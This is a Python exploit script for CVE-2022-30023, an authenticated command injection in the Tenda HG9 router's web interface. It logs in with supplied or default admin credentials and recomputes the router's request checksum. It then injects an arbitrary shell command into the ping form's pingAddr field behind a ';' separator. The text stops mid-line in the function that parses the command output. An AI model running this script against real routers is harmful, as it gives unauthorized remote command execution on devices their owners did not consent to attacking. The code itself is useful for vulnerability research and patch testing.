import requests
import argparse
import re
from urllib.parse import urlencode, quote_plus
def parseArgs():
parser = argparse.ArgumentParser(description='CVE-2022-30023 - Tenda HG9 Authenticated Command Injection By Thiago Pontes (Haniwa0x01)')
parser.add_argument('-u', '--url', nargs='?', type=str, required=True, default='127.0.0.1', help='url address')
parser.add_argument('-U', '--user', nargs='?', default='admin', required=True, help='Username to login to the Router')
parser.add_argument('-P', '--password', nargs='?', default='admin', required=True, help='Password to login to the Router')
args = parser.parse_args()
return args
def hash(inputVal):
i = 0
csum = 0
while i < len(inputVal):
if (i+4) > len(inputVal):
if i < len(inputVal):
csum += (ord(inputVal[i]) << 24)
if (i+1) < len(inputVal):
csum += (ord(inputVal[i+1]) << 16)
if (i+2) < len(inputVal):
csum += (ord(inputVal[i+2]) << 8)
break
else:
csum += (ord(inputVal[i]) << 24) + (ord(inputVal[i+1]) << 16) + (ord(inputVal[i+2]) << 8) + (ord(inputVal[i+3]))
i += 4
csum = (csum & 0xffff) + (csum >> 16)
csum = csum&0xffff
csum = (~csum)&0xffff
return inputVal + "postSecurityFlag=" + str(csum)
def login(host, data):
url = (host + "/boaform/admin/formLogin")
req = requests.Session()
data = (data)
page = req.post(url, data=data)
if "BroadBand Device Webserver" in page.text:
print("[!]: Logged!")
return req
else:
print("[!]: Not logged!!!")
return "false"
def logout(host, req):
url = (host + "/boaform/admin/formLogout")
data = ("save=Logout&submit-url=%2Flogin.asp")
req = req.post(url, data=data)
def exec(host, payload, req):
url = (host + "/boaform/formPing")
payload = {'pingAddr': f';{payload}', 'wanif':'65535', 'submit-url': '%2Fping.asp'}
result = urlencode(payload, quote_via=quote_plus)
res = result + "&"
csum = hash(res)
page = req.post(url, data=csum).text
resp = re.findall(r"(.*)